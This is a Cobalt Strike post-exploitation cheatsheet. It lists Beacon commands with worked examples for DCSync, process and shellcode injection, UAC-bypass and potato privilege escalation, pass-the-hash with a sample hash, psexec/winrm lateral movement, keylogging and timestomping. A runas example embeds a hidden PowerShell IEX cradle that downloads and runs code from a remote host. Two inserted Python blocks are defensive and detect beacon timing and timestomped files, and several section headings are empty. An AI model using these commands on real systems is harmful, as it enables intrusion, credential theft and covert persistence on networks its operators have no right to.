Cobalt Strike CheatSheet

General notes and advice for the Cobalt Strike C2 framework.

Summary

Basic Menu Explanation

Listeners

Egress Listeners

Pivot Listeners

Miscellaneous Listeners

Malleable C2 Profiles

In simple words, a Malleable C2 profile is a configuration file that defines how Beacon communicates and how it behaves when it executes modules, spawns processes and threads, injects DLLs, or touches disk and memory. It also configures what the payload's traffic will look like in a pcap, the communication interval and jitter, and so on.

The big advantage of custom Malleable C2 profiles is that we can configure and customize our payload to match our situation and target environment; that way we make ourselves stealthier, since we can blend in with the environment's normal traffic.

Aggressor Scripts

Aggressor Script is the scripting language built into Cobalt Strike version 3.0 and later. Aggressor Script allows you to modify and extend the Cobalt Strike client; these scripts can add functions to existing modules or create new ones.
Aggressor Script Tutorial

Common Commands

sleep [time in seconds] [jitter]

i.e.

sleep 5 60
sleep 120 40
...
download C:\Users\victim\Documents\passwords.csv
upload C:\Users\S1ckB0y1337\NotMalware\youvebeenhacked.txt
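The sleep and jitter values above, together with the communication interval a Malleable C2 profile sets, define the window inside which Beacon calls back. The following is an added example, not code from this cheatsheet or from Cobalt Strike: it models that window and runs a simple periodicity check over constructed proxy log lines. It assumes the documented semantics that jitter shortens the sleep by a random amount of up to the given percentage, so `sleep 300 20` yields callbacks 240 to 300 seconds apart; `SAMPLE_LOG`, the host names and addresses are all constructed.

```python
"""Beacon sleep/jitter: the callback window it defines and a periodicity check.

Added example; this is not code from the cheatsheet or from Cobalt Strike.
It assumes the documented semantics of `sleep [time in seconds] [jitter]`:
each callback waits `time` seconds shortened by a random amount of up to
`jitter` percent, so `sleep 300 20` yields intervals between 240 and 300 s.
SAMPLE_LOG is constructed data in a simplified "<timestamp> <src> <dst>" form.
"""
from collections import defaultdict
from datetime import datetime
import random


def sleep_window(seconds: int, jitter_pct: int) -> tuple[float, float]:
    """Shortest and longest gap between two callbacks for one sleep setting."""
    if seconds <= 0 or not 0 <= jitter_pct < 100:
        raise ValueError("sleep must be > 0 and jitter must be 0..99 percent")
    shortest = seconds - seconds * jitter_pct / 100
    return shortest, float(seconds)


def simulate_gaps(seconds: int, jitter_pct: int, count: int, seed: int = 7) -> list[float]:
    """Draw callback gaps uniformly from the window, as a beacon would."""
    lo, hi = sleep_window(seconds, jitter_pct)
    rng = random.Random(seed)
    return [rng.uniform(lo, hi) for _ in range(count)]


def estimate_sleep_jitter(gaps: list[float]) -> tuple[float, int]:
    """Invert the model: the longest observed gap approximates the sleep value
    and the relative spread of the gaps approximates the jitter percentage."""
    hi, lo = max(gaps), min(gaps)
    return hi, round(100 * (hi - lo) / hi)


# Constructed proxy log: one host checks in every 245-300 s, another browses.
SAMPLE_LOG = """\
2024-03-01T10:00:00 10.0.0.5 cdn.example.net
2024-03-01T10:00:00 10.0.0.9 news.example.org
2024-03-01T10:01:12 10.0.0.9 news.example.org
2024-03-01T10:05:00 10.0.0.5 cdn.example.net
2024-03-01T10:09:05 10.0.0.5 cdn.example.net
2024-03-01T10:13:35 10.0.0.5 cdn.example.net
2024-03-01T10:18:35 10.0.0.5 cdn.example.net
2024-03-01T10:22:50 10.0.0.5 cdn.example.net
2024-03-01T10:30:00 10.0.0.9 news.example.org
"""


def find_periodic_pairs(log_text: str, min_callbacks: int = 5,
                        max_jitter_pct: int = 50) -> dict[tuple[str, str], tuple[float, int]]:
    """Group connections by (src, dst), compute inter-arrival gaps and report the
    pairs whose gaps fit a bounded sleep/jitter window. Gaps spread wider than
    max_jitter_pct are not reported, so the threshold is a tuning trade-off
    between missed beacons and noisy browsing traffic."""
    seen: dict[tuple[str, str], list[datetime]] = defaultdict(list)
    for line in log_text.splitlines():
        ts, src, dst = line.split()
        seen[(src, dst)].append(datetime.fromisoformat(ts))

    flagged = {}
    for pair, times in seen.items():
        if len(times) < min_callbacks:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        sleep_s, jitter = estimate_sleep_jitter(gaps)
        if jitter <= max_jitter_pct:
            flagged[pair] = (sleep_s, jitter)
    return flagged


if __name__ == "__main__":
    for seconds, jitter in ((5, 60), (120, 40)):
        lo, hi = sleep_window(seconds, jitter)
        print(f"sleep {seconds} {jitter} -> callbacks every {lo:.0f}-{hi:.0f} s")
    print("recovered from simulated gaps:", estimate_sleep_jitter(simulate_gaps(300, 20, 50)))
    for (src, dst), (s, j) in find_periodic_pairs(SAMPLE_LOG).items():
        print(f"{src} -> {dst}: ~sleep {s:.0f} s, ~jitter {j}%")
```

Running it shows why the cheatsheet's `sleep 5 60` is an interactive setting (callbacks every 2 to 5 seconds) while `sleep 120 40` spreads them over 72 to 120 seconds, and it recovers an approximate sleep of 300 s and jitter of 18% for the constructed host. The spread of the gaps is bounded by the jitter percentage, which is what makes a long-running, low-jitter beacon stand out in proxy or firewall logs.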

Exploitation

dcsync [DOMAIN.fqdn] [DOMAIN\user]

i.e.

dcsync CORP.local CORP\steve.johnson
desktop [pid] [x86|x64] [high|low]

i.e.

desktop 592 x64 high
desktop 8841 x86 low

:exclamation: The high/low arguments specify the quality of the session.

execute-assembly [/path/to/local/.NET] [arguments]
inject [pid] [x86|x64] [listener]

i.e.

inject 9942 x64 Lab-SMB
inject 429 x86 Lab-HTTPS
...
shspawn [x86|x64] [/path/to/my.bin]

i.e.

shspawn x64 /opt/shellcode/malicious.bin

Privilege Escalation

elevate [exploit] [listener]

i.e.

elevate juicypotato Lab-SMB
elevate ms16-032 Lab-HTTPS
...
runasadmin [exploit] [command] [args]

i.e.

runasadmin uac-token-duplication [command]
runasadmin uac-cmstplua [command] 

Pivoting

socks [port]

i.e.

socks 9050

:exclamation: This requires your /etc/proxychains.conf to be configured to match the specified port. If operating on Windows, your proxychains.conf file may be located at %USERPROFILE%\.proxychains\proxychains.conf, (SYSCONFDIR)/proxychains.conf, or (Global programdata dir)\Proxychains\proxychains.conf.

Lateral Movement

portscan [ip or ip range] [ports]

i.e.

portscan 172.16.48.0/24 1-2048,3000,8080

The above command will scan the entire 172.16.48.0/24 subnet on ports 1 to 2048, 3000 and 8080. This can be utilized for single IPs as well.

runas [DOMAIN\user] [password] [command] [arguments]

i.e.

runas CORP\Administrator securePassword12! Powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.50.90:80/filename'))"
pth [DOMAIN\user] [hash]

i.e.

pth Administrator 97fc053bc0b23588798277b22540c40d
pth CORP\Administrator 97fc053bc0b23588798277b22540c40d
jump [psexec64,psexec,psexec_psh,winrm64,winrm] [server/workstation] [listener]

i.e.

jump psexec64 DC01 Lab-HTTPS
jump winrm WS04 Lab-SMB
jump psexec_psh WS01 Lab-DNS
...
remote-exec [method] [target] [command]

Exfiltration

keylogger [pid] [x86|x64]

i.e.

keylogger 8932 x64
keylogger
...

This command can also be used without specifying arguments to spawn a temporary process and inject the keystroke logger into it.

screenshot [pid] [x86|x64] [run time in seconds]

i.e.

screenshot 1042 x64 15
screenshot 773 x86 5

Miscellaneous

spawn [x86|x64] [listener]

i.e.

spawn x64 Lab-HTTPS
spawn x86 Lab-SMB
...
spawnas [DOMAIN\user] [password] [listener]

i.e.

spawnas CORP\bob.smith baseBall1942 Lab-SMB
spawnas Administrator SuperS3cRetPaSsw0rD Lab-HTTPS
...
spawnto [x86|x64] [c:\path\to\whatever.exe] 

i.e.

spawnto x64 c:\programdata\beacon.exe
spawnto x86 c:\users\S1ckB0y1337\NotMalware\s1ck.exe
spawnu [pid] [listener]

i.e.

spawnu 812 Lab-SMB
spawnu 9531 Lab-DNS
...
blockdlls [start|stop]
timestomp [fileA] [fileB]

i.e.

timestomp C:\Users\S1ckB0y1337\Desktop\logins.xlsx C:\Users\S1ckB0y1337\Desktop\notmalicious.xlsx
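From the defender's side, the timestomp command above leaves a recognisable trace: it copies fileB's timestamps onto fileA through the Win32 file-time API, which rewrites only the $STANDARD_INFORMATION attribute of the MFT record, while the $FILE_NAME attribute keeps the values set when the name was created. The following is an added example, not code from this cheatsheet or from Cobalt Strike: it applies that consistency check, plus the weaker whole-second heuristic, to constructed MFT records (`MftRecord`, `SAMPLE_RECORDS` and the paths are all constructed for illustration).

```python
"""Spotting a timestomped file from its MFT timestamps.

Added example; this is not code from the cheatsheet or from Cobalt Strike.
`timestomp fileA fileB` copies fileB's timestamps onto fileA through the
SetFileTime API, which only rewrites the $STANDARD_INFORMATION ($SI)
attribute of the MFT record; the $FILE_NAME ($FN) attribute keeps the values
written when the name was created. SAMPLE_RECORDS is constructed data in the
shape a parsed MFT export would give.
"""
from dataclasses import dataclass
from datetime import datetime, timezone

UTC = timezone.utc


@dataclass(frozen=True)
class MftRecord:
    path: str
    si_created: datetime
    si_modified: datetime
    fn_created: datetime
    fn_modified: datetime


def timestomp_indicators(rec: MftRecord) -> list[str]:
    """Return the heuristics that fire for one record (empty list: nothing odd)."""
    reasons = []
    # $FN is set when the name is created and is not reachable through
    # SetFileTime, so an $SI creation time earlier than $FN is inconsistent.
    if rec.si_created < rec.fn_created:
        reasons.append("$SI creation predates $FN creation")
    # Genuine NTFS writes carry 100 ns resolution; a whole-second $SI value
    # suggests a tool wrote it. Weak alone: archive extraction and copies
    # from FAT media also produce them, so treat it as corroboration.
    if rec.si_created.microsecond == 0 or rec.si_modified.microsecond == 0:
        reasons.append("an $SI timestamp has no sub-second component")
    return reasons


def triage(records: list[MftRecord]) -> dict[str, list[str]]:
    """Map each path with at least one indicator to its list of reasons."""
    hits = {}
    for rec in records:
        reasons = timestomp_indicators(rec)
        if reasons:
            hits[rec.path] = reasons
    return hits


# Constructed records: a normal file, a file whose $SI times were copied from a
# much older file, and a file extracted from an archive (whole-second mtime).
SAMPLE_RECORDS = [
    MftRecord(r"C:\Users\victim\Desktop\notes.txt",
              datetime(2024, 1, 10, 9, 15, 30, 123456, UTC),
              datetime(2024, 2, 3, 17, 40, 2, 908811, UTC),
              datetime(2024, 1, 10, 9, 15, 30, 123456, UTC),
              datetime(2024, 1, 10, 9, 15, 30, 123456, UTC)),
    MftRecord(r"C:\Users\victim\Desktop\logins.xlsx",
              datetime(2019, 5, 2, 8, 0, 17, 221100, UTC),
              datetime(2019, 6, 14, 16, 45, 9, 7766, UTC),
              datetime(2024, 3, 1, 14, 2, 11, 554433, UTC),
              datetime(2024, 3, 1, 14, 2, 11, 554433, UTC)),
    MftRecord(r"C:\Users\victim\Downloads\report.docx",
              datetime(2024, 2, 20, 10, 11, 12, 334455, UTC),
              datetime(2023, 6, 1, 12, 0, 0, 0, UTC),
              datetime(2024, 2, 20, 10, 11, 12, 334455, UTC),
              datetime(2024, 2, 20, 10, 11, 12, 334455, UTC)),
]


if __name__ == "__main__":
    for path, reasons in triage(SAMPLE_RECORDS).items():
        print(path)
        for reason in reasons:
            print("   -", reason)
```

The two constructed hits illustrate the difference between the rules: the file whose timestamps were copied from another file carries full-precision values, so only the $SI/$FN ordering check catches it, whereas the archive-extracted file trips only the whole-second heuristic. In practice the ordering check is the one to weight for this command; the precision check needs other evidence before it means anything.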

OPSEC Notes

EDR Evasion Tools and Methods

General Post-Exploitation TIPS